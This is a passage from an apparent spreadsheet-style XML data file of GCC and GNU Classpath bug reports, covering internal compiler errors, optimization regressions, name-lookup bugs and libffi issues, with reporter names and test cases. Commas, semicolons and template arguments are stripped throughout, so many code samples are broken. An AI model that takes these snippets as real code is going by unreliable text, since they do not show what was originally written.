/usr/share/bison/bison.simple: In function 'yyparse':
/usr/share/bison/bison.simple:960:1: error: unrecognizable insn:
(insn 1208 1207 1209 130 /usr/share/bison/bison.simple:801 (parallel [
            (clobber (reg:SI 571))
            (set (mem:BLK (reg:SI 570) [0 A8])
                (mem:BLK (reg:SI 571) [0 A8]))
            (set (mem/f/c/i:SI (plus:SI (reg/f:SI 39 virtual-stack-vars)
                        (const_int -52 [0xffffffffffffffcc])) [0 yyp+0 S4 A32])
                (unspec [
                        (mem:BLK (reg:SI 570) [0 A8])
                        (mem:BLK (reg:SI 571) [0 A8])
                        (reg:SI 0 %r0)
                    ] 601))
            (clobber (reg:CC 33 %cc))
        ]) -1 (nil))
/usr/share/bison/bison.simple:960:1: internal compiler error: in extract_insn at recog.c:2103
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-53329</t>
  </si>
  <si>
    <t>ICE with deferred-length module variables</t>
  </si>
  <si>
    <t>The following code gives an ICE:
  module m
    character(len=:) allocatable :: str
  end module m
Untested fix:
--- a/gcc/fortran/trans-decl.c
+++ b/gcc/fortran/trans-decl.c
@@ -11032 +110310 @@ gfc_create_string_length (gfc_symbol * sym)
       sym-&gt;ts.u.cl-&gt;backend_decl = length
+
+      if (sym-&gt;attr.save
+         || (ns-&gt;parent &amp;&amp; ns-&gt;parent-&gt;proc_name-&gt;attr.flavor == FL_MODULE))
+       TREE_STATIC (length) = 1
+
+      if (ns-&gt;parent &amp;&amp; ns-&gt;parent-&gt;proc_name-&gt;attr.flavor == FL_MODULE
+         &amp;&amp; (sym-&gt;attr.access != ACCESS_PRIVATE || sym-&gt;attr.public_used))
+       TREE_PUBLIC (length) = 1
     }</t>
  </si>
  <si>
    <t>GCC-60860</t>
  </si>
  <si>
    <t>Friend function declaration incorrectly hides function in outer namespace</t>
  </si>
  <si>
    <t>The following valid code fails to compile:
void f( int )
namespace N {
    struct A
    {
       friend void f(int)
       friend void f(double)
    }
    void g() {
        f(0)
    }
}
The problem goes away if any of the two friend declarations is commented out.</t>
  </si>
  <si>
    <t>dibeas</t>
  </si>
  <si>
    <t>GCC-59163</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] program compiled with g++ -O3 segfaults</t>
  </si>
  <si>
    <t>Created attachment 31232
Stripped preprocessed C++ source.
The attached test case crashes (segmentation fault) when run. It is a preprocessed file where I stripped just about everything from  except std::for_each.
gcc -v:
~/src $ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/app/gcc/4.8.2/libexec/gcc/x86_64-unknown-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./gcc-4.8.2/configure --prefix=/app/gcc/4.8.2 --enable-languages=cc++ --disable-multilib
Thread model: posix
gcc version 4.8.2 (GCC) 
~/src $ 
The complete command line that triggers the bug:
g++ -O3 -std=c++11 -Wall -Wextra bug2.ii
...then run the output program to see the segmentation fault
I tried building with:
g++ -O3 -std=c++11 -fno-strict-aliasing -fwrapv -fno-aggressive-loop-optimizations -Wall -Wextra bug2.ii
...and the same crash occurs.
The compiler outputs no messages (no warnings errors etc).
The program runs without crashing if compiled with -O0 -O1 -O2 or -Os.
I compiled with the latest version of clang++ bundled with Mac's XCode trying each optimization level and the program runs fine. Same with the latest version of MSVC (Visual Studio 2013).
The gdb segfault and backtrace:
Program received signal SIGSEGV Segmentation fault.
0x00000000004007a7 in Quaternion::slerp(Quaternion const&amp; Quaternion const&amp;) () at bug2.ii:82
82	{
(gdb) bt
#0  0x00000000004007a7 in Quaternion::slerp(Quaternion const&amp; Quaternion const&amp;) () at bug2.ii:82
#1  0x0000000000400475 in main () at bug2.ii:97
(gdb) 
Extra observations:
If I comment out int parent in the struct definition so that the struct becomes
  struct Joint
  {
    //int parent
    Quaternion orient
  }
the program no longer segfaults when compiled/run.</t>
  </si>
  <si>
    <t>donnyjward</t>
  </si>
  <si>
    <t>GCC-59964</t>
  </si>
  <si>
    <t>gcc segfault on compiling nested parameter pack code</t>
  </si>
  <si>
    <t>Created attachment 31965
code to produce the error.
I was trying to write a code (using mingw32 gcc4.8.1 as of Jan 2014) involving two parameter packs Args1... and Args2... . I used a nested class. Args1... and Args2... are similar and of same lengths. I wrote a shorthand using statement for the trivial when Args1... and Args2... are the same:
--
template 
using zip_t = zip::with
However gcc generates a segment fault when compiling this statement.
g++ -c -o testUsing.o -std=c++11 -I..  -Wall -Wextra -fno-strict-aliasing -fwrapv testUsing.cpp
testUsing.cpp: In substitution of 'template using zip_t = zip::with [with R = A Args = {}]':
testUsing.cpp:19:15:   required from here
testUsing.cpp:16:45: internal compiler error: Segmentation fault
 using zip_t = zip::with
......
A minimal code is as follows (also attached):
---------
template struct Tuple {}
template struct Pair {}
template  struct zip {
    template struct with {
        R flag
        typedef Tuple...&gt; type
    }
}
typedef zip::with::type T1
T1 make_zip1(bool) {return T1()}
template 
using zip_t = zip::with
template
static zip_t::type make_zip(A) {
  return zip_t::type{}
}
//test code
int main() { return 0 }</t>
  </si>
  <si>
    <t>tinlyx</t>
  </si>
  <si>
    <t>GCC-18302</t>
  </si>
  <si>
    <t>ACATS tests hang: c74004a c960004 and others</t>
  </si>
  <si>
    <t xml:space="preserve">
Running the Ada testsuite on Solaris 10/x86 hangs in the c94002f test:
pstack reveals the following stack trace:
21873:	/vol/gcc/obj/gcc-4.0.0-20041103/10-gcc-ada/gcc/testsuite/ada/acats/tes
-----------------  lwp# 1 / thread# 1  --------------------
 d2751779 lwp_park (0 0 0)
 d274bf03 cond_wait_queue (80b4480 80b4490 0 0) + 3b
 d274c40c _cond_wait (80b4480 80b4490) + 66
 d274c451 cond_wait (80b4480 80b4490 8045f88 808b14c) + 21
 0808b216 system__tasking__stages__vulnerable_complete_master (d27f0818 80b4438 8046228 8091a35 8046000 80b44f8) + ea
 080900b2 c94002f__B_1___clean.924 (8046000 80b44f8 8046228 8091b50 80a98c8 8046010) + 12
 08091a35 _ada_c94002f (29 d2780fb8 133f 1f80 8046238 80a9c4b) + 2f5
 0806d7d8 main     (1 804627c 8046284) + 3a
 0806d4b0 _start   (1 8046534 0 8046590 80465ee 8046605) + 60
-----------------  lwp# 2 / thread# 2  --------------------
 d2751779 lwp_park (0 0 0)
 d274bf03 cond_wait_queue (80b7868 80b7878 0 0) + 3b
 d274c40c _cond_wait (80b7868 80b7878) + 66
 d274c451 cond_wait (80b7868 80b7878 d274b1b1 1) + 21
 08089613 system__tasking__rendezvous__wait_for_call (80b7820 0 0 0 0 0) + 6b
 08089a67 system__tasking__rendezvous__accept_trivial (1 0 d25f9d58 808ffed 0 0) + db
 08090039 c94002f__ttB.416 (80b4b68 1 0 0 0 0) + 5d
 0808b6e0 system__tasking__stages__task_wrapper (80b7820) + 10c
 d2751530 _thr_setup (d2658400) + 50
 d27516f0 _lwp_start (d2658400 0 0 d25f9ff8 d27516f0 d2658400)
Unfortunately the test can only be killed with kill -9 which lets the
whole testsuite run abort.  For the moment I'm including the test in
norun.lst but that file isn't platform specific so with a shared source
tree the test is disabled everywhere.
Environment:
System: SunOS erebus 5.10 s10_69 i86pc i386 i86pc
Architecture: i86pc
host: i386-pc-solaris2.10
build: i386-pc-solaris2.10
target: i386-pc-solaris2.10
configured with: /vol/gnu/src/gcc/gcc-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --enable-languages=cada
How-To-Repeat:
Run make check as above.</t>
  </si>
  <si>
    <t>GCC-35658</t>
  </si>
  <si>
    <t>[4.3 Regression] between -funroll-loops -fno-automatic -O2 and common block variable</t>
  </si>
  <si>
    <t>Hi
[This bug was initially submitted to the Debian BTS at http://bugs.debian.org/466911 -- at the request of Debian's gcc maintainer I am also sending it here]
In porting CERNLIB to gfortran I've found an apparent gfortran compiler bug that results in incorrect code on ia64 (Itanium) with the compiler flags -funroll-loops -fno-automatic -O2 (or higher) possibly due to a bad interaction between these flags and a common block variable used in a computed GO TO statement of the form GO TO (1234) L.
The bug ONLY occurs in gfortran-4.3 -- I have tested that it does NOT happen in gfortran-4.1 (4.1.2-19) gfortran-4.2 (4.2.3-1) or g77-3.4 (3.4.6-6).
The output of gfortran-4.3 -v is:
(sid)kmccarty@merulo:~$ gfortran-4.3 -v
Using built-in specs.
Target: ia64-linux-gnu
Configured with: ../src/configure linux gnu
Thread model: posix
gcc version 4.3.1 20080309 (prerelease) (Debian 4.3.0-1)
Please see the complete test case I've provided at http://people.debian.org/~kmccarty/ia64-gfortran-test-fail.tar.gz
[Note I have updated this test case tarball to the gfortran version noted above since I originally submitted this bug to the Debian BTS.]
Notes on the test case:
1) The code that gets mis-compiled is in c201s.F (this can be verified by building c201s.F with -O0 and building all the rest with -funroll-loops -fno-automatic -O2 then linking and running the test program c201test)
2) If *any* of the compiler flags are changed (remove -funroll-loops remove -fno-automatic or lower the optimization to -O1) the code is built OK.
3) I have put the output of gfortran-4.3 on ia64 (files c201s.f c201s.s and c201s.o) for various compiler flag combinations in subdirectories in the test case tarball.  Also the output of the test program when run in the file output.txt in each subdirectory. (Subdirectories are named first after whether the test succeeds and second after the specific compiler flags used.)  You can quickly regenerate this output for all the various flag combinations in the test case with make output.
4) I believe the problem is that the variable L in common block FLABEL is not seen as having the correct value (should be 1 is set to that value in c201m.F prior to any call of C201S) within c201s.F.
5) If I make any tweak to L in c201s.F the bug disappears.  (Argh heisenbug!)  For instance any of the following tweaks individually causes the test program to succeed:
a) changing L to a local variable initialized to the value 1 at the top of c201s.F
b) setting L=1 at the top of c201s.F (keeping it in the common block)
c) printing the value of L to stdout at the top of c201s.F with a WRITE statement
d) printing the literal string 'L=n' to stdout (n being one of 1234) immediately after each label that the first GO TO jumps to (i.e. the value of L is not even directly read from).
Hence I was not able to simplify the test case any unfortunately.
best regards
Kevin McCarty</t>
  </si>
  <si>
    <t>kmccarty</t>
  </si>
  <si>
    <t>GCC-22582</t>
  </si>
  <si>
    <t>-rdynamic is undocumented</t>
  </si>
  <si>
    <t>The flag -rdynamic is not and has never been documented after its addition  
back in 1995:  
  http://gcc.gnu.org/ml/gcc/2005-07/msg00262.html 
A patch is here:  
  http://gcc.gnu.org/ml/gcc-patches/2005-07/msg00492.html  
W.</t>
  </si>
  <si>
    <t>GCC-2150</t>
  </si>
  <si>
    <t>This happens when trying to build jikes.  The ouput is:
[root@double src]# make
g++ -save-temps -DHAVE_CONFIG_H -I. -I. -I.     -O3 -c -o scanner.o scanner.cpp
tuple.h: In method `void Tuple::AllocateMoreSpace()':
tuple.h:194:   instantiated from `Tuple::NextIndex()'
tuple.h:208:   instantiated from `Tuple::Next()'
scanner.cpp:347:   instantiated from here
tuple.h:94: Internal compiler error.
tuple.h:94: Please submit a full bug report.
tuple.h:94: See  for instructions.
make: *** [scanner.o] Error 1
Release:
Reading specs from /usr/lib/gcc-lib/i686-redhat-linux/2.95.2.1/specs
Environment:
RH 6.2 2.2.18SMP 512mB glibc=glibc-2.2.1-1
How-To-Repeat:
Issue the make command again.</t>
  </si>
  <si>
    <t>treaves</t>
  </si>
  <si>
    <t>GCC-31937</t>
  </si>
  <si>
    <t>libffi doesn't support ppc without FPU</t>
  </si>
  <si>
    <t>PowerPC CPU without FPU (such as the PPC405EP) doesn't pass the libffi testsuite. Most of the tests crash with an illegal instruction error message even those that don't manipulate double/float. For instance it crashes with the cls_uint test.
After investigating I think the problem comes from the ppc assembly code from the libffi/src/powerpc directory that includes FPU instructions not supported by those CPU. In particular the ppc_closure.S file contains stfd FPU instructions that are supposed to save FPU registers and are always executed even if no fpu operation is to be performed.
If you don't need fpu support (as I do) a quick and dirty hack is to comment out those stfd instructions from the ppc_closure.S file.
I guess the right way to fix it would be to use the soft-float system when no FPU is present. But that's something I don't know how to do...
I've tried with gcc 3.4.3 and gcc 4.1.0 but I guess all versions are affected.</t>
  </si>
  <si>
    <t>patrick.olinet</t>
  </si>
  <si>
    <t>CLASSPATH-27375</t>
  </si>
  <si>
    <t>ZipFile.getEntries() should return entries in order</t>
  </si>
  <si>
    <t>Currently ZipFile.entries() uses a HashMap and thus returns the entries in an unspecified order. Switching to a LinkedHashMap will return the entries in insertion order which is the order that they appear in the zip file.
The attached patch switches to a LinkedHashMap and uses a Map for the entries type.</t>
  </si>
  <si>
    <t>GCC-35664</t>
  </si>
  <si>
    <t>unable to find a register to spill in class 'FP_REGS'</t>
  </si>
  <si>
    <t>Hi
compiling linux-2.6.24 for sparc fails with:
sparc-elf-gcc -c -O2 netdev-delta.c -mno-fpu
netdev.c-11.i: In function 'e1000e_update_stats':
netdev.c-11.i:84: error: unable to find a register to spill in class 'FP_REGS'
netdev.c-11.i:84: error: this is the insn:
(insn 166 123 140 4 netdev.c-11.i:76 (set (reg:DI 262 [ .stats.ptc1522 ])
        (mem/s:DI (plus:SI (reg/v/f:SI 26 %i2 [orig:121 adapter ] [121])
                (reg:SI 24 %i0 [244])) [15 .stats.ptc1522+0 S8 A64])) 45 {*movdi_insn_sp32} (expr_list:REG_EQUIV (mem/s:DI (plus:SI (reg/v/f:SI 26 %i2 [orig:121 adapter ] [121])
                (reg:SI 24 %i0 [244])) [15 .stats.ptc1522+0 S8 A64])
        (nil)))
netdev.c-11.i:84: confused by earlier errors bailing out
rev: 133439</t>
  </si>
  <si>
    <t>GCC-4358</t>
  </si>
  <si>
    <t>optimized code produces incorrect results</t>
  </si>
  <si>
    <t>when optimized with -O1 (or higher) the program produces
different (incorrect) results compared to -O0 optimisation.
The same problem occurs with gcc2.95 on Intel-Solaris
On Sparc-Solaris -O1 produces the same results....
It is reported to me to work correct on Power PC's
Release:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs Configured with: ../gcc-3.0/configure  Thread model: single  gcc version 3
Environment:
RedHat linux
How-To-Repeat:
just compile with -O0 or -O1 to see the differences</t>
  </si>
  <si>
    <t>ko.vandersloot</t>
  </si>
  <si>
    <t>GCC-13969</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] static const value rejected as template parameter</t>
  </si>
  <si>
    <t>gcc-3_4-branch from 2004/02/01 ca. 12:00pm PST
Configured with: ../gcc-3_4-branch/configure --prefix=/usr/local_cci/gcc-3_4-
branch_2004_02_01_1211 --enable-languages=cc++
Redhat Linux 8.0
% g++ -fPIC -ftemplate-depth-120 -w -DNDEBUG -O3 -DBOOST_PYTHON_MAX_BASES=2 -
Iinclude -I/net/worm/scratch1/rwgk/rc1310/include -
I/net/worm/scratch1/rwgk/rc1310/cctbx/include -
I/net/worm/scratch1/rwgk/rc1310/scitbx/include -
I/net/worm/scratch1/rwgk/rc1310/boost -I/usr/include/python2.2 -
E /net/worm/scratch1/rwgk/rc1310/cctbx/xray/boost_python/fast_gradients.cpp &gt; 
fast_gradients_pp.cpp
% g++ -fPIC -ftemplate-depth-120 -w -DNDEBUG -O3 -c fast_gradients_pp.cpp |&amp; 
head
In file included 
from /net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/fast_gradients.h:4
from /net/worm/scratch1/rwgk/rc1310/cctbx/xray/boost_python/fast_gradients.cpp:3
:
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:361: 
error: non-constant 
`cctbx::xray::detail::gaussian_fourier_transformed::max_n_rho_real_te
rms' cannot be used as template argument
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:361: 
error: ISO C++ forbids declaration of `as_real_' with no type
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:362: 
error: non-constant 
`cctbx::xray::detail::gaussian_fourier_transformed::max_n_rho_real_te
rms' cannot be used as template argument
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:362: 
error: ISO C++ forbids declaration of `bs_real_' with no type
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:364: 
error: non-constant 
`cctbx::xray::detail::gaussian_fourier_transformed::max_n_rho_real_te
rms' cannot be used as template argument
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:364: 
error: ISO C++ forbids declaration of `aniso_bs_real_' with no type
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h: In 
constructor 
`cctbx::xray::detail::gaussian_fourier_transformed::gaussian_fourier_
transformed(cctbx::xray::detail::exponent_table&amp; const 
cctbx::eltbx::xray_scattering::gaussian&amp; const FloatType&amp; const FloatType&amp; 
const FloatType&amp; const FloatType&amp; const FloatType&amp;)':
/net/worm/scratch1/rwgk/rc1310/cctbx/include/cctbx/xray/sampling_base.h:247: 
error: invalid types `int[size_t]' for array subscript
The same code compiles with many other compilers incl. earlier versions of gcc. 
It also compiled with gcc-3.4.0 from 2004/01/12.
I will attach the preprocessed source code. The same file is also available 
here:
http://cci.lbl.gov/~rwgk/bugs/gcc340/fast_gradients_pp.cpp.gz</t>
  </si>
  <si>
    <t>GCC-46467</t>
  </si>
  <si>
    <t>[4.6 Regression] gcc.dg/torture/pta-structcopy-1.c FAILs with -fipa-pta without inlining</t>
  </si>
  <si>
    <t>Created attachment 22385
modified gcc.dg/torture/pta-structcopy-1.c
Output:
$ gcc -O2 -fno-tree-sra -fipa-pta -fno-inline-functions-called-once -fno-inline-small-functions pta-structcopy-1.i
$ ./a.out
Aborted
Attached testcase only adds __attribute__((noinline)) to foo() with the same effect:
$ gcc -O2 -fno-tree-sra -fipa-pta pta-structcopy-1b.c
$ ./a.out
Aborted
Tested revisions:
r166703 - fail
r159696 - fail
r158095 - OK
4.5 r166509</t>
  </si>
  <si>
    <t>GCC-21555</t>
  </si>
  <si>
    <t>name lookup / friend function</t>
  </si>
  <si>
    <t>from c.l.c.moderated by Maxim Yegorushkin:
#include 
namespace N {
#ifdef SHOW_BUG
struct A
{
}
int swap(A
#else
struct A
{
      friend int swap(A
}
#endif
struct B : A
{
}
void swap(B&amp; x B&amp; y)
{
      using std::swap
      typedef char a[sizeof(swap(static_cast(x) static_cast(y))) ?
1 : -1]  // compiles only if int swap(A&amp; A&amp;) is found
}
}</t>
  </si>
  <si>
    <t>sstrasser</t>
  </si>
  <si>
    <t>GCC-14465</t>
  </si>
  <si>
    <t>[3.4 Regression] insn-output.c:790: error: `asm_out_file' undeclared</t>
  </si>
  <si>
    <t>The following error occurs in stage2:
stage1/xgcc -Bstage1/ -B/opt/gnu/gcc/gcc-3.4.0/hppa2.0w-hp-hpux11.00/bin/   -g -
O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-pedantic -Wno-long-long -Wold-style-definition     -DHAVE_CONFIG_H    -I. -I. -
I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include  -c insn-output.c \
  -o insn-output.o
insn-output.c: In function `output_188':
insn-output.c:790: error: `asm_out_file' undeclared (first use in this function)
insn-output.c:790: error: (Each undeclared identifier is reported only once
insn-output.c:790: error: for each function it appears in.)
insn-output.c: In function `output_189':
insn-output.c:801: error: `asm_out_file' undeclared (first use in this function)
Looking at the preproccessed source for insn-output.c I see the following:
# 385 ../../gcc/gcc/output.h
extern FILE *asm_out_file
...
static const char *
output_44 (rtx *operands __attribute__ ((__unused__)) rtx insn __attribute__ ((
__unused__)))
{
{
  rtx xoperands[3]
  extern FILE *asm_out_file
...
static const char *
output_45 (rtx *operands __attribute__ ((__unused__)) rtx insn __attribute__ ((
__unused__)))
{
{
  rtx xoperands[3]
  extern FILE *asm_out_file
...
static const char *
output_188 (rtx *operands __attribute__ ((__unused__)) rtx insn __attribute__ (
(__unused__)))
{
{
  output_asm_insn (bl .+8%0\n\tdepi 0312%0 operands)
  (*targetm.asm_out.internal_label) (asm_out_file L
                                     (((operands[1])-&gt;u.fld[6]).rtint))
  return 
}
}
...
If I remove the declations of asm_out_file from output_44 and output_45
the file compiles.  These declarations appear to be reminants from an
earlier time when output.h was not included.
It seems a declaration in an inner scope now causes an earlier declaration
at file scope to be forgotten.</t>
  </si>
  <si>
    <t>GCC-11867</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] static_cast ignores ambiguity</t>
  </si>
  <si>
    <t>Reading specs from /home/am/tools/gcc/usr/lib/gcc/i686-pc-linux-gnu/3.4/specs
Konfiguriert mit: /home/am/tools/gcc/gcc/configure
--prefix=/home/am/tools/gcc/usr --enable-languages=cc++ --enable-threads=posix
--disable-checking
Thread model: posix
gcc-Version 3.4 20030809 (experimental)
(and all earlier versions)
fails to detect this ambiguity:
g++ ambig.c
-----ambig.c-----
void ambig()
{
  struct A {}
  struct B : A {}
  struct C : A {}
  struct D : B C {}
	D d
 	A* ap = static_cast (
	D* db = static_cast (ap)  //err expected
	D  //err expected
	A
	D  //err expected
}</t>
  </si>
  <si>
    <t>alfred.minarik.1</t>
  </si>
  <si>
    <t>GCC-27953</t>
  </si>
  <si>
    <t>ICE with invalid function definitions</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE in the C frontend since
at least GCC 2.95.3:
=============================
void foo(struct A a) {}
void foo() {}
=============================
bug.c:1: warning: 'struct A' declared inside parameter list
bug.c:1: warning: its scope is only this definition or declaration which is probably not what you want
bug.c:1: error: parameter 1 ('a') has incomplete type
bug.c:2: error: redefinition of 'foo'
bug.c:1: error: previous definition of 'foo' was here
bug.c: In function 'foo':
bug.c:2: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in store_parm_decls_oldstyle at c-decl.c:6375
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-48772</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGSEGV in walk_non_aliased_vuses (gimple.h:1100) with -O -fnon-call-exceptions -fno-tree-ccp -fno-tree-dce</t>
  </si>
  <si>
    <t>Created attachment 24103
reduced testcase (from g++.dg/torture/pr44535.C)
Compiler output:
$ gcc -O -fnon-call-exceptions -fno-tree-ccp -fno-tree-dce testcase.C
==25341== Invalid read of size 1
==25341==    at 0xB0BE03: walk_non_aliased_vuses (gimple.h:1100)
==25341==    by 0xB80E8C: vn_reference_lookup (tree-ssa-sccvn.c:1697)
==25341==    by 0xB6DD99: eliminate (tree-ssa-pre.c:4341)
==25341==    by 0xB7103D: execute_pre (tree-ssa-pre.c:4921)
==25341==    by 0x984C55: execute_one_pass (passes.c:1555)
==25341==    by 0x984F34: execute_pass_list (passes.c:1610)
==25341==    by 0x984F46: execute_pass_list (passes.c:1611)
==25341==    by 0xACCBAA: tree_rest_of_compilation (tree-optimize.c:423)
==25341==    by 0xCAFB42: cgraph_expand_function (cgraphunit.c:1576)
==25341==    by 0xCB205B: cgraph_optimize (cgraphunit.c:1635)
==25341==    by 0xCB25E9: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==25341==    by 0x5BD42D: cp_write_global_declarations (decl2.c:4002)
==25341==    by 0xA71A87: toplev_main (toplev.c:591)
==25341==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==25341==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==25341== 
testcase.C: In function 'int main()':
testcase.C:26:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43813</t>
  </si>
  <si>
    <t>[DR1234] vector(3 NULL) fails to compile</t>
  </si>
  <si>
    <t>-------
#include 
std::vector v(7 0)
-------
lands on the
template  vector(InputIterator first InputIterator last const Allocator 
constructor instead of
explicit vector(size_type n const T 
which the user intended. The InputIterator constructor tries to forward to _M_fill_initialize because both arguments are integral but the 0 has now been permanently bound to the int type stopping it from converting to a null double*.
http://www.open-std.org/jtc1/sc22/wg21/docs/lwg-active.html#1234 indicates that the current behavior is conformant but that the committee seems to want to require the call to do what the user intended in a future standard.
Passing NULL instead of 0 makes the error depend on the build target. For example NULL appears to be an int on x86-32 but a long on x86-64 meaning the error appears on x86-32 but not on x86-64.</t>
  </si>
  <si>
    <t>GCC-26910</t>
  </si>
  <si>
    <t>re-merging java.util.zip</t>
  </si>
  <si>
    <t>Currently our java/util/zip/InflaterInputStream differs
from Classpath's.  Putting ours into Classpath causes regressions there.
Putting Classpath's into libgcj causes regressions in libgcj.
Probably one or both Inflater implementations is incorrect in some way.</t>
  </si>
  <si>
    <t>GCC-4134</t>
  </si>
  <si>
    <t>inline assembly - gcc fails to work around register pressure</t>
  </si>
  <si>
    <t>The demonstration code attached reveals that gcc may fail
to fold in inline assembly code when most all the registers
are used.  Here is the error message:
test_asm.c: In function `test_asm':
test_asm.c:6: Can't find a register in class `GENERAL_REGS' while reloading `asm'.
Just in guessing it seems that the compiler fails to copy
a piece of data to the stack when it otherwise runs out of
registers.  The compiler should be able to figure out how
to pass the data to the assembly block without help
especially since older gcc compilers (like egcs-2.91.66)
handle the code fine.
Release:
gcc version 3.0.2 20010825 (Debian prerelease)
Environment:
Linux version 2.2.18 #1 Thu Dec 21 18:49:41 CST 2000
arch: i686
How-To-Repeat:
/* compile with -DBUG for demonstration */
int
test_asm( int in0 int in1 int in2 int *t )
{
  int out[1]
#ifdef BUG        
  __asm__ (
           : =m (out)
           : r (in0)
            r (in1)
            r (in2)
            m (t[0])
           : %eax %ecx %edx
           )
#else
  int workaround_t0 = t[0]
  __asm__ (
           : =m (out)
           : r (in0)
            r (in1)
            r (in2)
            m (workaround_t0)
           : %eax %ecx %edx
           )
#endif
  return(*out)
}</t>
  </si>
  <si>
    <t>GCC-40704</t>
  </si>
  <si>
    <t>^M? in testsuite log leads to binary attachment</t>
  </si>
  <si>
    <t>Some gcc test results contain binary attachment:
http://gcc.gnu.org/ml/gcc-testresults/2009-07/msg00830.html
The problem is ^M? in
                === libffi tests === 
Running target unix/-m32
XPASS: libffi.call/cls_dbls_struct.c -O0 -W -Wall output pattern test 1.0 2.0^M?
XPASS: libffi.call/cls_dbls_struct.c -O2 output pattern test 1.0 2.0^M?
XPASS: libffi.call/cls_dbls_struct.c -O3 output pattern test 1.0 2.0^M?
XPASS: libffi.call/cls_dbls_struct.c -Os output pattern test 1.0 2.0^M?
XPASS: libffi.call/cls_dbls_struct.c -O2 -fomit-frame-pointer output pattern test 1.0 2.0^M?
                === libffi Summary for unix/-m32 === 
They come from
/* { dg-output 1.0 2.0\n { xfail x86_64-*-linux-* } } */
in libffi.call/cls_dbls_struct.c.</t>
  </si>
  <si>
    <t>GCC-3422</t>
  </si>
  <si>
    <t>Parentheses eating</t>
  </si>
  <si>
    <t xml:space="preserve">	The following code emits this warning
	warn.c: In function `foo':
	warn.c:3: warning: suggest parentheses around &amp;&amp; within ||
Release:
3.0 current mainline 2.95.2
Environment:
irrelevant
How-To-Repeat:
cat &gt; warn.c &lt;&lt;EOF
int foo (int a int b)
{
  return (a 
}
EOF
gcc -Wall -c warn.c</t>
  </si>
  <si>
    <t>GCC-44848</t>
  </si>
  <si>
    <t>Bogus array subscript is below array bounds with loops</t>
  </si>
  <si>
    <t>Testcase (derived from ffmpeg):
void av_solve_lls(double (*factor)[33] int count int min_order){
    int ijk
    for(i=0 i&lt;count i++){
        for(j=i j&lt;count j++){
            double sum = factor[i][j]
            for(k=i-1 k&gt;=0 k--)
                sum -= factor[i][k]*factor[j][k]
            factor[i][i]= sum
        }
    }
    for(j=count-1 j&gt;=min_order j--){
        for(i=j i&gt;=0 i--){
            factor[0][j]= 0
        }
        factor[0][j] = 0
        for(i=0 i&lt;=j i++){
            factor[0][j] += 0
        }
    }
}
With the following command-line:
gcc l.c -S -Wall -O2
Gives the following warning:
/tmp/l.c: In function â€˜av_solve_llsâ€™:
/tmp/l.c:18:18: warning: array subscript is below array bounds
Using gcc 4.5.0 on x86-64-pc-linux-gnu built from source configured with configure --enable-languages=c --disable-bootstrap.
The testcase is a little large but I can't figure out how to reduce it more the issue seems very sensitive to the precise structure of the code.</t>
  </si>
  <si>
    <t>eli.friedman</t>
  </si>
  <si>
    <t>GCC-35193</t>
  </si>
  <si>
    <t>[4.3 Regression] can't find a register in class 'R1_REGS' while reloading 'asm'</t>
  </si>
  <si>
    <t>when I try to compile a current glibc for hppa I get the following error:
gcc -O2 -c dcigettext.i
dcigettext.c: In function _nl_find_msg:
../ports/sysdeps/unix/sysv/linux/hppa/nptl/lowlevellock.h:220: error: can't find a register in class 'R1_REGS' while reloading 'asm'
dcigettext.c:1102: error: can't find a register in class 'R1_REGS' while reloading 'asm'
dcigettext.c:1164: error: can't find a register in class 'R1_REGS' while reloading 'asm'
dcigettext.c:1194: error: can't find a register in class 'R1_REGS' while reloading 'asm'
../ports/sysdeps/unix/sysv/linux/hppa/nptl/lowlevellock.h:220: error: 'asm' operand has impossible constraints
dcigettext.c:1102: error: 'asm' operand has impossible constraints
dcigettext.c:1164: error: 'asm' operand has impossible constraints
dcigettext.c:1194: error: 'asm' operand has impossible constraints
however if I remove the lines with starting # signs in the preprocessed code like:
grep -v ^# dcigettext.i &gt; x.i
it just compiles. The original error also vanishes if I use -O instead of -O2.
Adding preprocessed dcigettext.i to reproduce run 
gcc -O2 -c dcigettext.i</t>
  </si>
  <si>
    <t>GCC-10188</t>
  </si>
  <si>
    <t>gcc test.c  or g77 test.f -malign-double</t>
  </si>
  <si>
    <t>It seems double precision is not used:
----fortran code----
      real a
      double precision b
      a = 0.555555555555555555
      b = 0.555555555555555555
      write(61) a
      write(62) b
1     format('real   'f30.28)
2     format('double 'f30.28)
      end
gives : 
real   0.5555555820465087890625000000
double 0.5555555820465087890625000000
------C code -----
#include 
float a
double b
main()
{
  a = b = 0.555555555555555555
  printf(real   %.28f\na)
  printf(double %.28f\nb)
}
gives:
real   0.5555555820465087890625000000
double 0.5555555555555555802271783250
-----
For C double has higher resolution but for fortran 
there is no differece. I have tried various
compiler flags without luck !
Release:
